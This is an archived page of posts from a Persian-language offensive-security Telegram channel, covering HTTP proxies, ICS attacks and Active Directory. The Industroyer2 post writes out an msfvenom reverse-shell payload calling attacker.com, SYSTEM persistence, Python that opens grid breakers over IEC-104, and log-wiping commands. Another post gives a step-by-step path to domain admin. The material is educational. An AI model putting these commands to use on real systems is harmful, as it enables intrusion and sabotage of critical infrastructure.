Try Hack Box
الذهاب إلى القناة على Telegram
1 Nov 2020 1399/08/11 🔴 THB | Offensive Security آموزش، تحقیق و تجربه عملی در امنیت تهاجمی Penetration Testing · Red Teaming · AI Security 🎯 یاد بگیر. آزمایش کن. حرفهای شو.
إظهار المزيد6 476
المشتركون
+224 ساعات
+627 أيام
+11330 أيام
أرشيف المشاركات
6 479
📌 پروکسیها در واقع واسطههایی هستند که بین کلاینتها و سرورها قرار میگیرند و مانند یک نماینده عمل میکنند.
🌍 مثال روزمره:
فرض کنید میخواهید نامهای به یک شرکت بفرستید، اما به جای ارسال مستقیم، آن را به دفتر پستی میسپارید. دفتر پستی نامه را دریافت میکند، آدرس را بررسی میکند، سپس آن را به مقصد نهایی میرساند. حتی ممکن است قبل از ارسال، محتوای نامه را بررسی کند یا آن را در یک پاکت جدید بگذارد.
🔹 پروکسی هم دقیقاً همینطور کار میکند!
وقتی شما به اینترنت متصل میشوید، درخواستهای شما ابتدا به پروکسی میرود.
پروکسی میتواند درخواست را تغییر دهد، فیلتر کند یا کش کند و سپس به سرور اصلی ارسال کند.
پاسخ سرور هم ابتدا به پروکسی برمیگردد و بعد به شما میرسد.
💡 پروکسی مثل همان دفتر پستی است: واسطهای که ارتباط شما با دنیای اینترنت را مدیریت میکند!
🔍 واسطههای وب (Web Intermediaries) چیستند؟
تصور کنید میخواهید با یک فروشگاه آنلاین ارتباط برقرار کنید:
📱 بدون پروکسی (ارتباط مستقیم):
شما (کلاینت) ← مستقیماً به فروشگاه (سرور)
🖥 با پروکسی (ارتباط با واسطه):
شما ← پروکسی ← فروشگاه
✨ به زبان ساده:
پروکسی مثل یک رابط هوشمند عمل میکند که:
- درخواستهای شما را دریافت میکند
- به جای شما با سرور اصلی ارتباط برقرار میکند
- پاسخ را از سرور گرفته
- و در نهایت آن را به شما تحویل میدهد
💡 مثل یک مترجم یا نماینده: دقیقاً همانطور که در مذاکرات بینالمللی از مترجم استفاده میشود، پروکسی هم بین شما و سرورهای اینترنتی واسطه میشود تا ارتباط به بهترین شکل ممکن برقرار شود.
🌐 نحوه عملکرد:
- بدون پروکسی، کلاینتها مستقیماً با سرورهای HTTP ارتباط برقرار میکنند
- با وجود پروکسی، کلاینت با سرور پروکسی صحبت میکند
- پروکسی به نمایندگی از کلاینت با سرور اصلی ارتباط برقرار مینماید
- کلاینت تراکنش را کامل انجام میدهد، اما از خدمات ارزشمند پروکسی بهره میبرد
🔄 ویژگیهای کلیدی:
- هم به عنوان سرور وب (برای کلاینت)
- هم به عنوان کلاینت وب (برای سرور اصلی) عمل میکند
- درخواستهای HTTP را به سرورهای مناسب ارسال میکند
- اتصالات و درخواستها را مدیریت مینماید
- پاسخها را دقیقاً مانند یک وب سرور بازمیگرداند
⚙️ مهمترین وظایف:
- ارسال درخواستهای HTTP به سرورها
- دریافت و پردازش پاسخها
- رعایت دقیق پروتکلهای HTTP
- مدیریت صحیح تراکنشها بین کلاینت و سرور
✍️نویسنده
@TryHackBox| The Chaos
#HTTP #Proxy #CyberSecurity
6 479
🚀 آموزش Proxies (پارت 0)
📌 پروکسیها در واقع واسطههایی هستند که بین کلاینتها و سرورها قرار میگیرند و به عنوان یک سرور پروکسی عمل میکنند. باهم دربارهی سرورهای پروکسی صحبت میکنیم که چگونه درخواستهای HTTP را بین طرفین (کلاینت و سرور) به جلو و عقب منتقل میکنند.
🔍 مباحثی که در سری پست ها به آنها پرداخته میشود:
✅ نحوه قرارگیری پروکسیها در مقابل دروازهها و استقرار آنها در HTTP
✅ راههایی که پروکسیها میتوانند مفید باشند و به ما کمک کنند
✅ نحوه استقرار پروکسیها در شبکههای واقعی و هدایت ترافیک به سرورهای پروکسی
✅ روش پیکربندی مرورگر برای استفاده از پروکسی
✅ تفاوت درخواستهای پروکسی با درخواستهای مستقیم به سرور و تأثیر پروکسیها بر رفتار مرورگرها
✅ چگونگی ردیابی مسیر درخواستها با استفاده از هدرهای Via و متد TRACE
✅ کنترل دسترسی مبتنی بر پروکسی در HTTP
✅ تعامل پروکسیها با سرورها و کلاینتهایی که نسخهها و ویژگیهای متفاوتی از HTTP را پشتیبانی میکنند
✍️نویسنده
@TryHackBox| The Chaos
#HTTP #Proxy #CyberSecurity
6 479
⭕️ دیگر کانال ها و شبکه های اجتماعی ما را دنبال کنید :
💠 کانال های تلگرام ما
🔶 آموزش تست نفوذ و Red Team
🆔 @TryHackBox
🔶 رودمپ های مختلف
🆔 @TryHackBoxOfficial
🔶 داستان های هک
🆔 @TryHackBoxStory
🔶 آموزش برنامه نویسی
🆔 @TryCodeBox
🔶 رادیو زیروپاد ( پادکست ها )
🆔 @RadioZeroPod
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
👥 گروه های پرسش و پاسخ
🔷 هک و امنیت
🆔 @TryHackBoxGroup
🔷 برنامه نویسی
🆔 @TryCodeBoxGroup
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🔴 اینستاگرام :
🔗 http://www.instagram.com/TryHackBox
🔵 یوتیوب :
🔗 https://youtube.com/@tryhackbox
6 479
🔖 بازگشت سایهی استاکسنت – قسمت اول
حمله واقعی به زیرساخت برق اوکراین با Industroyer2
💠 حمله پیشرفتهای از نوع ICS Targeted Malware توسط گروه APT روسی (Sandworm) تو سال ۲۰۲۲، گروه هکری وابسته به اطلاعات نظامی روسیه (GRU) با نام Sandworm حملهای بزرگ و واقعی به زیرساخت برق اوکراین انجام داد. این حمله نسخهای ارتقایافته از بدافزار معروف استاکسنت بود که بهش لقب دادن:
Industroyer2این حمله بهقصد خاموشی گسترده و بیثباتی در مناطق حساس در اوکراین طراحی شده بود، دقیقاً همزمان با حملهی نظامی روسیه. حالا تو این دو قسمت، این حمله رو در ۵ فاز عملیاتی بررسی میکنیم. 📌 فاز اول: شناسایی و جمعآوری اطلاعات از شبکه برق (ICS Recon) هکرها قبل از حمله، با استفاده از ابزارها و تکنیکهای OSINT و دسترسی اولیه به شبکه، ساختار سیستم برق و نوع تجهیزات ICS رو شناسایی کردن. 🛠 ابزارهای مورد استفاده: < — Shodan — > پیدا کردن PLCها و HMIهای متصل به اینترنت < — Wireshark — > برای بررسی پروتکلهای صنعتی مثل IEC-104، Modbus, DNP3 < — Nmap — > با اسکریپتهای مخصوص ICS < — FOCA — > برای جمعآوری متادیتای فایلهای منتشرشده توسط شرکت برق < — Active Directory Enum — > برای کشف سیستمهای مهندسی در شبکه داخلی اسکن نمونه با Nmap:
nmap -sS -p 2404 --script=modbus-discover 10.10.0.0/16
استخراج اطلاعات PLC از ترافیک IEC-104 با Wireshark:
iec104.asdu.typeid == 45 || iec104.asdu.typeid == 46
📌 فاز دوم: ورود به شبکه و اجرای اولیه بدافزار
گزارش CERT-UA نشون میده که Sandworm از حساب RDP یکی از مهندسین شبکه وارد سیستم شده و از طریق یک فایل آلوده بدافزار رو مستقر کرده.
🔶 روشهای ورود
سرقت رمز عبور از طریق فیشینگ یا Keylogger
استفاده از RDP Credentialهای لو رفته
اجرای فایل EXE مخرب با دسترسی SYSTEM
نمونه بدافزار ساختهشده با msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=attacker.com LPORT=443 -f exe > industroyer2.exe
ایجاد Persistence:
schtasks /create /tn "SCADA Sync" /tr "C:\ProgramData\industroyer2.exe" /sc onlogon /ru SYSTEM
📌 فاز سوم: ارتباط مستقیم با PLC و تخریب زیرساخت
بدافزار Industroyer2 بهصورت مستقیم به PLCهای شبکه برق وصل میشه و با استفاده از پروتکل IEC-104 دستور باز یا بستهکردن بریکرها (Breaker) رو صادر میکنه.
🔶 ساختار عملکرد بدافزار:
- اتصال TCP به پورت 2404 (IEC-104)
- ارسال دستور Single Command برای باز کردن بریکر
- ارسال دستور Double Command برای شبیهسازی فرمان مهندسی قانونی
نمونه کد Python برای باز کردن Breaker:
from iec104 import IEC104Client client = IEC104Client("10.0.0.12", 2404) client.connect()
Cause = Spontaneous client.send_command(asdu_type=45, ioa=101, value=0) # breaker open client.disconnect()
فایل کانفیگ شبکه در بدافزار:
{ "targets": [ {"ip": "10.0.0.12", "type": "siemens", "breaker_id": 101}, {"ip": "10.0.0.15", "type": "schneider", "breaker_id": 110} ], "payload_type": "iec104", "command": "breaker_open" }
📌 فاز چهارم: پاکسازی ردپا و لاگها
بعد از اجرا، بدافزار تلاش میکنه ردپاهای خودش رو پاک کنه
دستورات استفادهشده:
wevtutil cl System wevtutil cl Application Remove-Item -Path "$env:APPDATA\Microsoft\Windows\Recent\*" -Force
📌 فاز پنجم: شناسایی حمله و مقابله توسط CERT-UA
مرکز پاسخ اضطراری اوکراین تونست حمله رو در لحظه آخر شناسایی کنه.
تحلیل نمونه Industroyer2 نشون داد که فقط روی سیستمهای خاص با تجهیزات SCADA فعال میشه.
با بررسی لاگهای شبکه و دسترسی مشکوک از RDP کشف و فایل EXE با نام جعلی update_driver.exe روی سیستم مهندسین دیده شد.
🔶 روشهای دفاعی پیشنهادی
- استفاده از ابزارهای تخصصی ICS مانند Nozomi و Dragos
- ایزولهکردن کامل سیستمهای SCADA و PLC از شبکه IT
- بررسی ترافیک پورت 2404 با Suricata/Zeek برای دستورات مشکوک
- تحلیل Signatureهای پروتکل IEC-104
📌 این حمله ادامهی استاکسنت بود؛ با دقت بیشتر، طراحی خاص برای اوکراین و قابلیت اجرای فرمان مستقیم روی شبکه برق. این حمله نشون داد که تو دنیای جنگهای مدرن، کلید برق یه کشور میتونه با یه packet خاموش بشه.
✍️نویسنده
@TryHackBox| Condor
#ICS #SCADA #CyberWarfare #APT #Industroyer #InfoSec6 479
🚨 نفوذ هکرها به تاسیسات آب آمریکا با رمز عبور پیشفرض "1111"
هفته گذشته، یک گروه هکری توانست فقط با استفاده از رمز عبور ساده و پیشفرض 1111 کنترل بخشی از سیستم مدیریت تاسیسات آبرسانی در یکی از ایالتهای آمریکا را بهدست بگیرد
این سیستمها معمولاً برای کنترل فشار آب، ترکیب مواد شیمیایی تصفیه و سطح مخازن استفاده میشوند. هک شدن چنین سیستمی میتواند امنیت عمومی را به خطر بیندازد و بله، هنوز هم در سال 2025 چنین رمزهایی کار میکنند!
⚠️ وقتی یک سیستم حیاتی مثل آبرسانی یا برق، فقط با یک رمز ساده قابل هک باشد، نتایجش میتواند فاجعهبار باشد به عنوان مثال
- آلودگی عمدی آب آشامیدنی
- قطع گسترده برق یا اختلال در خدمات شهری
ـ ارسال هشدارهای جعلی یا ایجاد وحشت عمومی
ـ حمله باجافزاری به بیمارستان، بانک یا ادارههای دولتی
- نفوذ به زنجیره تأمین کالاها و گسترش بدافزارها
✅ پیشنهاد میشه اگر شما هم از مودم، دوربین، دستگاه هوشمند یا حتی گوشی استفاده میکنید، موارد زیر را جدی بگیرید
- هیچوقت از رمز پیشفرض استفاده نکنید (مثل 1234 یا admin)
- دستگاههای هوشمند را بدون رمز یا با پورت باز به اینترنت وصل نکنید
- رمزها را هر چند وقت یکبار تغییر دهید
- از احراز هویت دومرحلهای استفاده کنید، مخصوصاً در ایمیل، واتساپ و شبکههای اجتماعی
🟠 سخن نهایی
امنیت فقط مخصوص هکرها یا دولتها نیست و همه ما در زنجیره امنیت نقش داریم.
📚 منبع اصلی خبر
The Hacker News – Default Passwords Still a Threat in 2025
✍️نویسنده
@TryHackBox| The Chaos
#CyberSecurity #SCADA #ICS #Hacking #news #CriticalInfrastructure #IOTSecurity #IndustrialSecurity #CyberAttack #2025Security
6 479
+3
📚 کتابچه "Mimikatz: تسلط عملی بر تکنیکهای پیشرفته حملات Active Directory" از مقدماتی تا پیشرفته.
اگر در حوزه امنیت سایبری و تست نفوذ Active Directory فعالیت میکنید، این کتابچه ضروریترین منبعی است که میتوانید داشته باشید!
منبعی کامل برای تیمهای قرمز (Red Team)، شامل دستورات عملی، اسکریپتهای آماده، و تکنیکهای evasion است که مستقیماً در تستهای نفوذ استفاده میشوند.
همین حالا این کتاب تخصصی را به زبان فارسی بخوانید.
🔥 تخفیف به مناسبت جشن تیرگان
💰 قیمت اصلی: ۲۵۰,۰۰۰ تومان
💥 با ۴۰٪ تخفیف: فقط ۱۵۰,۰۰۰ تومان
⚠️ مهلت تخفیف: تا آخر شب .
📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید:
@THBxSupport
6 479
تیرگان بر ایرانیان فرخنده باد.❤️
۱۰ تیر، روزیست که در دل اساطیر ایران میدرخشد؛
روزی که آرش کمانگیر، جان خویش را در تیر نهاد تا مرز ایرانزمین را از فراز دماوند تا دوردستها برساند.
تیرگان در تقویم ایران باستان، جشن آب، باران، تیر و پاکیست. در این روز، ایرانیان به یاد آرش، برای باران دعا میکردند، در کوزهها آب میریختند، و با پاشیدن آب، دلها را تازه میکردند.
جالبتر اینکه ابوریحان بیرونی این روز را «بزرگداشت نویسندگان» نیز دانسته؛ روزی برای پاسداشت اندیشه و واژه.
برخی روایتها، تیرگان را در ۱۳ تیر دانستهاند، اما آنچه پابرجاست، خود یاد آرش و شکوه فرهنگ ایرانیست
جشن تیرگان(جشن آب پاشان) 📖جشن تیرگان در تیر روز از تیرماه برابر با ۱۳ تیر در گاهشمار زرتشتی و ۱۰ تیر در گاهشمار جلالی برگزار میشود. این جشن در گرامیداشت تیشتر(ستاره ی باران آور در فرهنگ ایرانی)است. در روزشمارها تیرگان روز کمان کشیدن آرش کمانگیر و پرتاب تیر از فراز البرز است. همچنین جشن تیرگان به گفته ابوریحان بیرونی در آثارالباقیه، روز بزرگداشت جایگاه نویسندگان در ایران باستان بوده است.@TryHackBox
6 479
#سوال
چگونه یک مهاجم می تواند از سرویس های آسیب پذیر برای دستیابی به دسترسی اولیه بهره برداری کند؟
6 479
ما در مجموعه TryHackBox به دنبال مدرسین باانرژی و خلاق هستیم تا به تیم ما بپیوندند. اگر علاقهمند به تدریس و انتقال تجربههاتون هستید، خوشحال میشیم رزومهتون رو برامون ارسال کنید یا با ما تماس بگیرید.
ما منتظر دریافت رزومههای شما هستیم تا به تیم ما بپیوندید!
میتوانید رزومه خود را به ادرس های زیر ارسال کنید :
@ThbxSupport
Email : tryhackbox@gmail.com
6 479
Repost from
خب، اولین مسئله:
در حین جمعآوری و تحلیل اطلاعات، متوجه شدیم روی ایستگاه کاری W-434 سرویس Web Client فعال هست. حساب کامپیوتری W-434 میتونه «رمز عبور» حساب سرویس GMSA$ رو بخونه. حساب سرویس GMSA$ عضو گروهیه که اجازه خوندن ویژگی LAPS برای ادمین لوکال روی سرور SERVERHTTP رو داره. خود حساب سرور هم برای Kerberos Unconstrained Delegation تنظیم شده.
شرط اضافه: سطح دامنه ۲۰۱۶ هست.
هدف: گرفتن دسترسی ادمین دامنه.
راهحل:
فعال بودن سرویس Web Client این امکان رو میده که تکنیک NTLM Relay رو از HTTP به LDAP اجرا کنیم و سطح دامنه ۲۰۱۶ هم اجازه میده تکنیک Shadow Credentials رو بهعنوان payload استفاده کنیم. با وادار کردن ایستگاه کاری W-434 به احراز هویت و relay کردن احراز هویت NTLM به LDAP، تکنیک Shadow Credentials رو اجرا میکنیم.
کلید خصوصی و عمومی بهدست اومده رو استفاده میکنیم و TGT بلیت برای شیء کامپیوتر W-434 میگیریم. حالا با دسترسی حساب کامپیوتر W-434، هش رمز عبور حساب سرویس GMSA$ رو میخونیم.
با اجرای تکنیک Overpass-the-Hash، میتونیم درخواستها رو بهجای حساب سرویس بفرستیم. چون این حساب عضو گروه READ_LAPS هست، مقدار ویژگی ms-Mcs-AdmPwd سرور SERVERHTTP (یعنی رمز ادمین محلی) رو میگیریم.
با استفاده از این اطلاعات وارد سرور SERVERHTTP میشیم. Rubeus رو در حالت مانیتور اجرا میکنیم و احراز هویت اجباری کنترلر دامنه رو راه میندازیم و سرور SERVERHTTP رو بهعنوان listener میذاریم. بعد از چند ثانیه، TGT بلیت کنترلر دامنه رو میگیریم.
حالا با تکنیک Pass-the-Ticket این بلیت رو ایمپورت میکنیم. در این حالت میتونیم تکنیک DCSync رو از طرف کنترلر دامنه اجرا کنیم و هش رمز ادمین دامنه رو بهدست بیاریم.
@KavehAPT
6 479
⭕ دیگر کانال ها و شبکه های اجتماعی ما را دنبال کنید :
💠 کانال های تلگرام ما
🔶️ آموزش تست نفوذ و Red Team :
🆔 @TryHackBox
🔶️ رودمپ های مختلف :
🆔 @TryHackBoxOfficial
🔶️ داستان های هک :
🆔 @TryHackBoxStory
🔶️ آموزش برنامه نویسی :
🆔 @TryCodeBox
🔶️ رادیو زیروپاد ( پادکست ها ) :
🆔 @RadioZeroPod
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🔴 اینستاگرام :
🔗 http://www.instagram.com/TryHackBox
🔵 یوتیوب :
🔗 https://youtube.com/@tryhackbox
6 479
💠 چند ساله دارم از BloodHound استفاده میکنم
وقتی تو مرحله تحلیل مسیرها، اطلاعات سشنهای ادمینها رو روی یه سری سیستم پیدا میکنی، وقتی بالاخره با کلی زحمت به اون سیستمها با دسترسی لازم میرسی، تو ۹۰٪ مواقع دیگه اون سشنها اونجا نیستن! و تازه وقتی یه مسیر جدید پیدا میکنی، دوباره سشنها ظاهر میشن!
به نظرتون شما هم اینو تجربه کردین؟
@TryHackBox
6 479
⭕ در روزهای گذشته به دلیل شرایط ناشی از جنگ ما فعالیت خود را متوقف کردیم . اکنون با بهبود اوضاع فعالیت خود را از سر میگیریم و این بار با برنامهها و رویکردهای تازه مصممتر از همیشه برای دستیابی به اهدافمان گام برمیداریم.
ممنون از همراهی و شکیبایی شما
6 479
Repost from
DPAPI (Data Protection API)
یک تکنولوژی است که توسط مایکروسافت برای حفاظت از دادهها در سیستمعاملهای ویندوز طراحی شده است. این تکنولوژی برای رمزنگاری اطلاعات حساس مانند پسوردها، کلیدهای رمزنگاری، و دیگر دادههای مهم استفاده میشود. DPAPI برای کاربران و برنامهها امکان حفاظت از دادههایشان را فراهم میکند و به صورت خودکار از طریق کلیدهای رمزنگاری خاص سیستم عامل، دادهها را حفاظت میکند.
حمله به DPAPI:
حمله به DPAPI معمولاً به منظور استخراج دادههای رمزنگاریشده از سیستم یا نفوذ به اطلاعات حساس انجام میشود. این نوع حملات میتواند بر روی سیستمهای آسیبپذیر یا زمانی که دسترسی به سیستم یا کلیدهای خاص موجود باشد، انجام گیرد.
روشهای رایج حمله به DPAPI:
1. دسترسی به فایلهای رمزنگاریشده:
* اگر یک مهاجم به فایلهایی که با DPAPI رمزنگاری شدهاند دسترسی داشته باشد، ممکن است قادر به استخراج دادههای رمزنگاریشده باشد. البته این دادهها تنها زمانی قابل رمزگشایی هستند که مهاجم به کلیدهای مناسب دسترسی داشته باشد.
2. دسترسی به کلیدهای DPAPI:
* برای رمزگشایی اطلاعاتی که توسط DPAPI رمزنگاری شدهاند، مهاجم باید به کلیدهای خاص سیستم دسترسی پیدا کند. در حالت عادی، این کلیدها باید به طور امن ذخیره شوند، ولی در صورتی که مهاجم بتواند به این کلیدها دسترسی پیدا کند، میتواند دادههای رمزنگاریشده را رمزگشایی کند.
3. حملات مبتنی بر حافظه (Memory Dumping):
* یکی از روشهای معمول حمله به DPAPI، dump کردن حافظه سیستم است. در این روش، مهاجم ممکن است بتواند از حافظه سیستم (که کلیدهای DPAPI در آن ذخیره میشوند) اطلاعاتی استخراج کند. در صورتی که مهاجم به حافظه فیزیکی یا حافظه سیستم دسترسی داشته باشد، ممکن است بتواند کلیدها یا دادههای رمزنگاریشده را شبیهسازی کند.
4. حملات به ذخیرهسازی و پروفایلهای سیستم:
* بسیاری از اطلاعاتی که با DPAPI رمزنگاری میشوند، در پروفایلهای کاربران ویندوز ذخیره میشوند. اگر مهاجم به پروفایلهای خاص یا فولدرهای مربوط به کاربران دسترسی پیدا کند، میتواند به اطلاعات رمزنگاریشده یا کلیدهای لازم برای رمزگشایی آنها دسترسی پیدا کند.
5. مهندسی اجتماعی (Social Engineering):
* در برخی از موارد، مهاجم ممکن است از تکنیکهای مهندسی اجتماعی برای فریب کاربران و به دست آوردن دسترسی به سیستمها یا حسابهای کاربری استفاده کند. در این صورت، مهاجم میتواند از دسترسی به دادههای رمزنگاریشده استفاده کند.
نتیجهگیری:
حمله به DPAPI معمولاً زمانی اتفاق میافتد که مهاجم به سیستم تارگت دسترسی پیدا کرده باشد یا از آسیبپذیریهای موجود در سیستم بهرهبرداری کند. برای کاهش خطرات مربوط به DPAPI، باید از روشهای امنیتی مختلف مانند رمزنگاری کامل دیسک، تایید هویت چندعاملی، و نظارت دقیق بر سیستم استفاده کرد.
@KavehAPT
6 479
🥷 دور زدن احراز هویت Ruby-SAML / GitLab (CVE-2024-45409)
چرا باید CVE های مختلف را مطالعه کنیم؟ حداقل برای گسترش افق دید شما در صنعت پیچیده ما و درک پیشنیازهای باگها. امروز، برای شما، یک آسیبپذیری حیاتی دیگر در GitLab را بررسی میکنیم که به شما امکان میدهد مکانیسمهای احراز هویت SAML را دور بزنید و با استفاده از یک نقص در پردازش پاسخ SAML، به دسترسی غیرمجاز دست یابید.
🔶️ بخوانید
#CVE #writeup
@TryHackBox
6 479
🔍 Merklemap
— یک موتور جستجوی جدید برای زیردامنهها و گواهیهای SSL/TLS. بهترین چیز وقتی که به شناسایی غیرفعال سریع نیاز دارید.
مثال:
=example.com, *ex*mple*, *.example.com#tools #recon @TryHackBox
6 479
🔥 به تحقیق در مورد امنیت وردپرس علاقه دارید؟
محقق امنیتی، آناندا داکال، روش خود را برای پیدا کردن تزریق SQL غیرمجاز در افزونه WooCommerce Wishlist وردپرس شرکت TI به اشتراک میگذارد.
https://patchstack.com/articles/unpatched-sql-injection-vulnerability-in-ti-woocommerce-wishlist-plugin/
#pentest #bugbounty #bestpractices
@TryHackBox
